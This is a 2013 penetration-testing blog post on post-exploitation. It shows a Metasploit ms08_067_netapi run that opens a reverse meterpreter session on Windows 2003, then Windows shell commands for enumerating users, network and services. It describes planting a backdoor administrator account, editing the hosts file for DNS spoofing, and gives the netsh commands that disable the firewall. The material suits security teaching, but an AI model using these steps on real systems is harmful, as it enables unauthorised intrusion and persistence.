Sunday, August 25, 2013

Post Exploitation :- Windows Shell commands

If you are trying to exploit windows 2003 or Windows Xp, the best and well known exploit is ms08_067_netapi. This post is to post exploitation and walkthrough of different commands using shell

Successful Exploit on Windows 2003
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST  yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( -> at 2013-08-24 14:41:21 -0400

Once the exploit got executed successfully, Metasploit throws a shell back to the attacker for interacting with it. Since we are useing generic windows reverse shell, it doesn’t have much options like meterpreter shell. However a generic windows shell can be also used for pretty much of post exploitation things.  

To gain shell access

Boot and Win .ini files – these two files give you some basic information about the target system. 

Boot.ini contains the information related to running operating system (basically the options to display when the startup program is running). 

Win.ini file contains boot time settings, such as fonts, language settings, extensions, wallpaper, screensaver, communication drivers etc.
It’s good to know about the partition drives in the system so that an attacker can navigate through this and locate sensitive files

Host files are pretty interesting one as it can be used for local system DNS spoofing. You can find an additional domain name added to the list which is pointing to the attacker’s machine (backtrack).


Netview : Try enumerating more details about the account users information. net view will show the computer/host name in the specified domain. net domain will show the domain name. net localgroup administrators will list all local administrators in the system.

It is also possible to check for the local user accounts by net user command, and further we can also add a backdoor account into the group. After we added one such account, it’s also possible to add this backdoor user account into the local administrator group for privileged access.

ipconfig command has more options to deal with the network communication, some
of them are listed below:
/? Displays this help message
/all Displays full configuration information
/release Releases the IP address for the specified adapter
/renew Renews the IP address for the specified adapter
/flushdns Purges the DNS Resolver cache
/registerdns Refreshes all DHCP leases and reregisters DNS names
/displaydns Displays the contents of the DNS Resolver Cache
/showclassid Displays all the DHCP ClassIds allowed for the specified adapter
/setclassid Modifies the DHCP ClassId

Similarly netstat command allows you to see the current network connections, routing table details etc. Routing table can be enumerated using a direct windows command “route print” as well.

More netstsat options to view the network connections initiated by respective process ID. We can see the connections established by metasploit is also listed in the output. Windows findstr command can be used to perform some smart filtering of the output

Netsh diagnostic (diag) commands can give you network configuration details such as dns, proxy server configuration for IE, gateway, dhcp server etc. 

netsh command ships with all windows NT systems. It can be used to enumerate a plethora of configuration information about the target. The above screen shot shows the firewall configurations in the target system.
To enable windows firewall : netsh firewall set opmode enable
To disable windows firewall : netsh firewall set opmode disable

Service Control commands can query for what are the services and it’s current status. It is also possible to start and stop these services